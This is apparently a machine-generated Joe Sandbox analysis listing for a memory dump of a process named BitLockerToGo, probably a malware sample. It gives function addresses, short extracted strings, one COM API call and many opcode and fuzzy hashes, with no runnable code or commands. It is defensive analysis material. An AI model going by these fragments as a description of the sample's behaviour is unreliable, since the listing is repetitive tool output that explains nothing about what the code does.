                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: e7w$mk$us
                                                                                                                                                                                        • API String ID: 0-596661717
                                                                                                                                                                                        • Opcode ID: 25f2a3b04f45238aeb8424435ec5b321ced0735d23cee67ab070603637d7730b
                                                                                                                                                                                        • Instruction ID: e8e8c494b54afac77c0be467d11329e715b3c06e9d7baee1dc2ca64fc41326d2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 25f2a3b04f45238aeb8424435ec5b321ced0735d23cee67ab070603637d7730b
                                                                                                                                                                                        • Instruction Fuzzy Hash: B651A9B0508380AFD300CF25D881B6BBBA5FBC6754F60192CF5985B292DB74C906CF8A
                                                                                                                                                                                        Function 004018F3 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 0123456789ABCDEFXP$0123456789abcdefxp$@
                                                                                                                                                                                        • API String ID: 0-1376090547
                                                                                                                                                                                        • Opcode ID: 26d8ad69e380fc302dcc0da1b67ff620a5c1d5113c79a957a35dca8a868012a1
                                                                                                                                                                                        • Instruction ID: a25a264c8e5610dc55820ca494c5bedb85bf23171f471518dceb19a54ba4f053
                                                                                                                                                                                        • Opcode Fuzzy Hash: 26d8ad69e380fc302dcc0da1b67ff620a5c1d5113c79a957a35dca8a868012a1
                                                                                                                                                                                        • Instruction Fuzzy Hash: 46416A715087418FD714CF19C0A436BFBE1AFC9368F188A6EE4E9673A1C7788805CB4A
                                                                                                                                                                                        Function 004266DB Relevance: 3.3, Strings: 2, Instructions: 787COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: /;),$;#13
                                                                                                                                                                                        • API String ID: 0-423675788
                                                                                                                                                                                        • Opcode ID: b60c2e7c6d1b56676ba169865188e948f2fed177bcba08c6ae9394c4b6521799
                                                                                                                                                                                        • Instruction ID: aca944d4e23013e6281ce78edc78cf711290cb61668bc898aacbded1add03392
                                                                                                                                                                                        • Opcode Fuzzy Hash: b60c2e7c6d1b56676ba169865188e948f2fed177bcba08c6ae9394c4b6521799
                                                                                                                                                                                        • Instruction Fuzzy Hash: D7320275A00226CFDB14CF68EC50AAEB7B2FF4A315F5A8179D811A7390D735AC11CB94
                                                                                                                                                                                        Function 004036E0 Relevance: 2.9, Strings: 2, Instructions: 433COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: Inf$NaN
                                                                                                                                                                                        • API String ID: 0-3500518849
                                                                                                                                                                                        • Opcode ID: adee5959bb9557dde77fc92beaa8b945c60b9d0d0e4017672eced2eee7a22ad1
                                                                                                                                                                                        • Instruction ID: ff09ee90d3e26bc8f89c40248453be00092e56fd331b09a0f2edf7984a1dbd5c
                                                                                                                                                                                        • Opcode Fuzzy Hash: adee5959bb9557dde77fc92beaa8b945c60b9d0d0e4017672eced2eee7a22ad1
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0BE1B6B6A083019BC704CF28C88161BBBE5EBC8750F158A3EF895A73D1D779DD458B86
                                                                                                                                                                                        Function 00426000 Relevance: 2.9, Strings: 2, Instructions: 432COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: @A$turs
                                                                                                                                                                                        • API String ID: 0-1262509192
                                                                                                                                                                                        • Opcode ID: 71bc5a2eb015f4e6fd30a5d889349a39e999bccaa6fc099c322c40b034f6812b
                                                                                                                                                                                        • Instruction ID: 49dc033d6dbf70a531a5417f5ec258a52fbab98d97c3e76e9c844aca7102c5fd
                                                                                                                                                                                        • Opcode Fuzzy Hash: 71bc5a2eb015f4e6fd30a5d889349a39e999bccaa6fc099c322c40b034f6812b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EC14571A043209BD710EF28D88266BB7E1EF95314F5A892DE8C597381E338ED45C79A
                                                                                                                                                                                        Function 00442010 Relevance: 2.9, Strings: 2, Instructions: 397COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: KJML$P
                                                                                                                                                                                        • API String ID: 0-1281581042
                                                                                                                                                                                        • Opcode ID: 6864d91a6bfef3863e490dac7609a2434bbcfa3df33c63e3b12fd9cc91fe95bd
                                                                                                                                                                                        • Instruction ID: c84c8ad5e36eccb623441b2d37765a8459fadb75eac3de7e9a24417d937c0de0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6864d91a6bfef3863e490dac7609a2434bbcfa3df33c63e3b12fd9cc91fe95bd
                                                                                                                                                                                        • Instruction Fuzzy Hash: 17C110316082214FE719CA18985072FB7E1EBC5714F55862EE8AA9F3D1CBB8DC46C7C5
                                                                                                                                                                                        Function 004427C0 Relevance: 2.8, Strings: 2, Instructions: 314COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 2,D$B)D
                                                                                                                                                                                        • API String ID: 0-372517732
                                                                                                                                                                                        • Opcode ID: 205bb86f249f886410146e568ae15c38211d69c351eedfe3f2ce4ae89efb18fa
                                                                                                                                                                                        • Instruction ID: 1fa342f85b8ef9af1d040f909e923bd4db03789b12d09860a98adb9fa8d5d691
                                                                                                                                                                                        • Opcode Fuzzy Hash: 205bb86f249f886410146e568ae15c38211d69c351eedfe3f2ce4ae89efb18fa
                                                                                                                                                                                        • Instruction Fuzzy Hash: AA910039608311CFD304DF29E89066AB7E5FB8E314F0989BCE98993351D771E845CB89
                                                                                                                                                                                        Function 004417C0 Relevance: 2.8, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID: KJML$KJML
                                                                                                                                                                                        • API String ID: 2994545307-1613884386
                                                                                                                                                                                        • Opcode ID: 78d47a0726b98ca59d22d5613aafd0696075c70137bd17aaef0a62e5ed0c91a5
                                                                                                                                                                                        • Instruction ID: 6da08042b9e43ed455c22ae99ea8e0b958d9f116125a2d0d2af920f562be82bb
                                                                                                                                                                                        • Opcode Fuzzy Hash: 78d47a0726b98ca59d22d5613aafd0696075c70137bd17aaef0a62e5ed0c91a5
                                                                                                                                                                                        • Instruction Fuzzy Hash: C29139716083006BE724DB14CC51FBB77D1EF85314F58882EE589D73A1E738A881C75A
                                                                                                                                                                                        Function 00442880 Relevance: 2.8, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 2,D$B)D
                                                                                                                                                                                        • API String ID: 0-372517732
                                                                                                                                                                                        • Opcode ID: bba222e9187541d307f423837e0a9759bc03d19576d75a8bb620746927279c26
                                                                                                                                                                                        • Instruction ID: d7ebadb32b627ee662257d4f662d33c7b57ad4f71a43a6d689c3f339b6192096
                                                                                                                                                                                        • Opcode Fuzzy Hash: bba222e9187541d307f423837e0a9759bc03d19576d75a8bb620746927279c26
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F81EF3660C314CFD308DF29E89066AB7E1FB8A314F09897CE98983351D775E905CB8A
                                                                                                                                                                                        Function 00427E23 Relevance: 2.7, Strings: 2, Instructions: 243COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: #T$WW
                                                                                                                                                                                        • API String ID: 0-101372553
                                                                                                                                                                                        • Opcode ID: 1560de6b25e4ca0f6d4301de1c38ae748092c63c96c33a80cbde7f5ec4d72012
                                                                                                                                                                                        • Instruction ID: 85d8569f0707c6d26ad7fb811a2198b374dadc967cf69134860faa56ee94b9cc
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1560de6b25e4ca0f6d4301de1c38ae748092c63c96c33a80cbde7f5ec4d72012
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A91A1B5E003189FEB20DF68DD42B9DBB70EB46304F1481A9E548AB382D7358956CFD6
                                                                                                                                                                                        Function 0043E2C0 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 0$h
                                                                                                                                                                                        • API String ID: 0-1772827726
                                                                                                                                                                                        • Opcode ID: 0c2f226561208197253e35b0964b7b742a931cbbba1f0157d1618d4c7461fb69
                                                                                                                                                                                        • Instruction ID: 1a9ebc3e7b62b06804d38631d59773dcf2fb18181b8a24faf5c96181843b2949
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c2f226561208197253e35b0964b7b742a931cbbba1f0157d1618d4c7461fb69
                                                                                                                                                                                        • Instruction Fuzzy Hash: CD6156B46093009FD710DF1AC440B6BBBE5EF99304F24982EE9D59B390C37AE845CB96
                                                                                                                                                                                        Function 00410A15 Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 89$LKJi
                                                                                                                                                                                        • API String ID: 0-2183204925
                                                                                                                                                                                        • Opcode ID: 1ce7aeea86d95e81e9ea2b88f6bc55537f68257eaa4bf64c2722177d91bdb4d7
                                                                                                                                                                                        • Instruction ID: b142fb3b824a3b340488d91b7ebffeee8a72fe134906f958762fe520b23f27f5
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ce7aeea86d95e81e9ea2b88f6bc55537f68257eaa4bf64c2722177d91bdb4d7
                                                                                                                                                                                        • Instruction Fuzzy Hash: 654175366083908BC314CF15C88166BB7E2FFD5354F09899DF8C89B340DB789946CB8A
                                                                                                                                                                                        Function 00401A7D Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 0123456789ABCDEFXP$@
                                                                                                                                                                                        • API String ID: 0-1121606115
                                                                                                                                                                                        • Opcode ID: b53557e47c368dcf51e7f1a69ba2f913baa4658b94177401d52740415c2ae4df
                                                                                                                                                                                        • Instruction ID: 46082c99e1110106a6d45bd01e5b7f7cbd20cedb8a94ec19ac618b55a40a23af
                                                                                                                                                                                        • Opcode Fuzzy Hash: b53557e47c368dcf51e7f1a69ba2f913baa4658b94177401d52740415c2ae4df
                                                                                                                                                                                        • Instruction Fuzzy Hash: D9313B715087418BD718CF19C0A436BFBE1AFC9364F189A2EA4E9673E1C7789904CB46
                                                                                                                                                                                        Function 0043E650 Relevance: 1.8, Strings: 1, Instructions: 599COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID: f
                                                                                                                                                                                        • API String ID: 2994545307-1993550816
                                                                                                                                                                                        • Opcode ID: 11fbd0d5cde49853ab6e9cdfca083b603a5a95dd2c271dfa384e43bdf826221d
                                                                                                                                                                                        • Instruction ID: 6649bbbb4bb15e33f2021c4374345cc7ffa4552ec515435c59a7015c32fb9775
                                                                                                                                                                                        • Opcode Fuzzy Hash: 11fbd0d5cde49853ab6e9cdfca083b603a5a95dd2c271dfa384e43bdf826221d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1022AE756093419FC714CF2AC880B2BBBE1ABC9314F189A2EF5958B3D1D738D845CB96
                                                                                                                                                                                        Function 00404DF0 Relevance: 1.8, Strings: 1, Instructions: 534COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: %1.17g
                                                                                                                                                                                        • API String ID: 0-1551345525
                                                                                                                                                                                        • Opcode ID: b412980d213ed516da98ebabcffb5d932e68a46acf4e5109edfa1b3a243ae4c9
                                                                                                                                                                                        • Instruction ID: b49ac4134a64c9596f07efea1e0c8deec74fab226808be5a67872c9141ff0472
                                                                                                                                                                                        • Opcode Fuzzy Hash: b412980d213ed516da98ebabcffb5d932e68a46acf4e5109edfa1b3a243ae4c9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A1217B1A08B418BE7158E58D48032BB7D2EFA1304F18857FD8956B3C1E7B9DC45CB4A
                                                                                                                                                                                        Function 00425DA0 Relevance: 1.7, APIs: 1, Instructions: 241comCOMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CoCreateInstance.OLE32(00446B80,00000000,00000001,00446B70), ref: 00425DC9
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateInstance
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 542301482-0
                                                                                                                                                                                        • Opcode ID: eea97a5192f1c9506813d76ef220e5770f7cb6113c417c8c8e06f39deaa1d0b1
                                                                                                                                                                                        • Instruction ID: 92c063b61ab353469d99c4d40c496fc7f9be6ac4a02dfe3d19263ec7b6681ee2
                                                                                                                                                                                        • Opcode Fuzzy Hash: eea97a5192f1c9506813d76ef220e5770f7cb6113c417c8c8e06f39deaa1d0b1
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1151BDB1700720ABDB209B24EC86B7773A4EF86768F554519F985CB390F778E901C72A
                                                                                                                                                                                        Function 00420C90 Relevance: 1.6, Strings: 1, Instructions: 371COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: z!"#
                                                                                                                                                                                        • API String ID: 0-429687905
                                                                                                                                                                                        • Opcode ID: e7160bb7b78a8afe324cd61f144104c7576c357284f4f74add537356b84d2412
                                                                                                                                                                                        • Instruction ID: f1f19b6e5a11e21aa2845b1a198fc788c2a651f6f0f19f8cc094703b1917d0dc
                                                                                                                                                                                        • Opcode Fuzzy Hash: e7160bb7b78a8afe324cd61f144104c7576c357284f4f74add537356b84d2412
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AB101B1A143118BC724CF28D85136BB7F1FF95314F898A2EE8858B391E778D944C79A
                                                                                                                                                                                        Function 00442960 Relevance: 1.5, Strings: 1, Instructions: 287COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 2,D
                                                                                                                                                                                        • API String ID: 0-2418935499
                                                                                                                                                                                        • Opcode ID: ab2205d3d970be152914290462e2c9910ce5a979beb55d9b9a93c0818bbe57e4
                                                                                                                                                                                        • Instruction ID: 53c44a7cac65b914731dabd635d2c91a21c1277618180420b3d1f92b44a748f0
                                                                                                                                                                                        • Opcode Fuzzy Hash: ab2205d3d970be152914290462e2c9910ce5a979beb55d9b9a93c0818bbe57e4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A81023671C3148FD308DF29D9A126BB7E2FB8A714F09893EE885D3391D678D9448B85
                                                                                                                                                                                        Function 0040A410 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: ,
                                                                                                                                                                                        • API String ID: 0-3772416878
                                                                                                                                                                                        • Opcode ID: 26218c9c1370a7ddc9bb927c04509b3969731cb4df7de6fd365aeea0f5029a81
                                                                                                                                                                                        • Instruction ID: b3414554a80e2dbb62b390b87682af4b151155a3d2be20912d66614438ff3d60
                                                                                                                                                                                        • Opcode Fuzzy Hash: 26218c9c1370a7ddc9bb927c04509b3969731cb4df7de6fd365aeea0f5029a81
                                                                                                                                                                                        • Instruction Fuzzy Hash: B5B138711083819FC321CF18C88461BFBE0AFA9704F448E2EE5D997782D675E918CBA7
                                                                                                                                                                                        Function 0042BCB0 Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: @,
                                                                                                                                                                                        • API String ID: 0-608918562
                                                                                                                                                                                        • Opcode ID: 12d3153cb7bc255d7ca880b3807ee84f9480c9713f3ba18247162fb3f2338e07
                                                                                                                                                                                        • Instruction ID: 497425c06fc17601fc8cb0a2f005411f028e1bc110ed0ac542a95cd7aaedfb73
                                                                                                                                                                                        • Opcode Fuzzy Hash: 12d3153cb7bc255d7ca880b3807ee84f9480c9713f3ba18247162fb3f2338e07
                                                                                                                                                                                        • Instruction Fuzzy Hash: EF81E0716183558BD318DF29988179FBBE2EBC6700F05CD2DE5D59B384CB78990ACB82
                                                                                                                                                                                        Function 004350E0 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 004352C0
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                                                                                                                                                                        • API String ID: 0-2471034898
                                                                                                                                                                                        • Opcode ID: 43417d1739509e3f7d8cd9af9bd2a62e8d22d5141dee40243128b75579a48c21
                                                                                                                                                                                        • Instruction ID: 5f4e21d9fa04d370fc1fc92a50827c2301553c401730d7fdbad26749d1448ab0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 43417d1739509e3f7d8cd9af9bd2a62e8d22d5141dee40243128b75579a48c21
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3761F937A1AD9047CB11593C4C013AA6B131BEB374F3E93ABD8B58B3D1C96E8903535A
                                                                                                                                                                                        Function 004107EB Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: !
                                                                                                                                                                                        • API String ID: 0-2553554435
                                                                                                                                                                                        • Opcode ID: eb5080301330f4d5b3dec2c877bc2331a13b310edc5b9c61989d81b59761e2d6
                                                                                                                                                                                        • Instruction ID: 667df2aef690415bd6ffa681d8b2bbe36f9ff3277f3623b0d348b5ab8a7fa54c
                                                                                                                                                                                        • Opcode Fuzzy Hash: eb5080301330f4d5b3dec2c877bc2331a13b310edc5b9c61989d81b59761e2d6
                                                                                                                                                                                        • Instruction Fuzzy Hash: A831547361C3494BD3209FA8CD8535BBBD5ABD5204F1E893DE584D7352EAB8C9068781
                                                                                                                                                                                        Function 0042C0F5 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: <KJM
                                                                                                                                                                                        • API String ID: 0-3851247750
                                                                                                                                                                                        • Opcode ID: f8c954e7871009303307f08bc8d578476c4c0611dd961def60ed6fdaaff5a141
                                                                                                                                                                                        • Instruction ID: 27252ea4756a17c38d73e4e66724fd1e9db4a84f06acb749c7b4938b5406f34e
                                                                                                                                                                                        • Opcode Fuzzy Hash: f8c954e7871009303307f08bc8d578476c4c0611dd961def60ed6fdaaff5a141
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B31AFB4608301CBC7209F64D8A176BB7F0FF85358F00496DF1A68B3A1E7799801CB4A
                                                                                                                                                                                        Function 00443A60 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
